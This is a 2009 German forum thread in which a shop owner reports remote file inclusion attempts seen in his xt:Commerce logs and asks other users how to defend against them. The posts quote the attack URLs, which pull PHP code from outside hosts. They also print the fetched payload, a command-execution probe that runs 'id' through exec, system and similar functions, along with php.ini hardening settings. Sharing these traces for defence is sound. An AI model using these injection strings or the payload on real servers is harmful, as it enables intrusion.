Zum Thema Sicherheit: Angriffe auf das Shopsystem

Saunders Computer · #1 (**permalink**) 30.07.2009, 19:04

Guten Tag,

heute ist mir im Who's online Modul dieser Besucher aufgefallen.
Er hat offensichtlich versucht auf Shopinterne Daten zuzugreifen, mit folgendem, per Hand eingegebenen Aufruf:

00:07:38 0 Guest 91.121.89.135 20:09:31 20:09:31 /index.php?cat=c802_Handys---Navigation.html%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.anyche.com/goods_img1/satu.txt??

Was könnte er damit bezwecken wollen und wie muss ich das bewerten?
Vielen Dank für Ratschläge.

Saunders Computer · #2 (**permalink**) 30.07.2009, 20:06

Und noch einer:

00:11:20 0 Guest 80.249.173.242 21:17:02 21:17:02/index.php?cat=c802_Handys---Navigation.html///?_SERVER[DOCUMENT_ROOT]=http://www.red-zone.com.ua/ec.txt??

http://www.red-zone.com.ua/ec.txt sieht so aus:

Die Textdatei <?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;

df:bug · #3 (**permalink**) 30.07.2009, 20:19

Hallo,

schau mal hier, hab ich bei google.de gefunden. Da muss ich das nicht erklären, handelt sich um eine versuchte PHP Injection.

Link: Umfangreiche PHP-Abfragen via Kotaktmodul von NukeStyles Contact!

Edit: Das habe ich noch hier im Forum gefunden: Hackversuch ?!?!

Viele Grüße,
df:bug

Saunders Computer · #4 (**permalink**) 31.07.2009, 00:16

so jetzt habe ich darauf geachtet, dass
in der php.ini eingestellt ist:

allow_url_fopen = Off
disable_functions = exec,passthru,shell_exec,system,proc_close,proc_ge t_status,proc_nice,proc_open,proc_terminate
register_globals = Off
SafeMode = On

Habt Ihr vll. noch ein paar Vorschläge?

Teilweise wurde berichtet, das o.g. Code auch über das Kontaktformular eingeschleust werden kann.
Kann man dem auch entgegenwirken?

Gruß

df:bug · #5 (**permalink**) 31.07.2009, 07:33

Hallo,

wer will kommt irgendwie rein, aber so bist du auf einem gutem Wege, sind die Kleinigkeiten weg, wird es für den Angreifer schwieriger.

Viele Grüße,
df:bug

Saunders Computer · #6 (**permalink**) 05.09.2009, 22:02

Hierbei handelt es sich eindeutig um einen unzulässigen zugriff........
hilft da noch eine einfache ip sperre über .htacess oder muss man das direkt in der product_info.php ausschließen? (root server)

Hat jemand ähnliche Beobachtungen gemacht und wenn ja, kann mir einer sagen was ich davon halten soll?

Aus Who's online:

78.34.43.47 22:46:27 22:46:27
/product_info.php?info=http://217.218.225.2:2082/index.html?

Vielen Dank

Themen-Optionen
Druckbare Version zeigen Jemanden per E-Mail auf dieses Thema hinweisen
Ansicht
Linear-Darstellung Zur Hybrid-Darstellung wechseln Zur Baum-Darstellung wechseln

Ähnliche Themen
Thema	Autor	Forum	Antworten	Letzter Beitrag
PayPal Express Modul mit GiroPay - Stand 08.05.2012	mikkel	PayPal Express-Kaufabwicklung für xt:Commerce	288	27.04.2012 18:07
[NEWS - Shopbetreiber] Aktuelle Rechtsprechung zum Thema Vertragsfallen im Internet	News	xt:Commerce Mitteilungen	0	29.05.2009 10:10
[NEWS - Shopbetreiber] Urteile zum Rechtsmissbrauch - Teil 1: Das Grundlagen-Urteil d	News	xt:Commerce Mitteilungen	0	24.04.2009 17:50
Alternative zu einem Iframe?!	kaktus82	Template System	18	14.05.2008 08:35
Produktives Shopsystem local auf xammp instalieren	skinart	Installation und Konfiguration	9	15.05.2007 18:12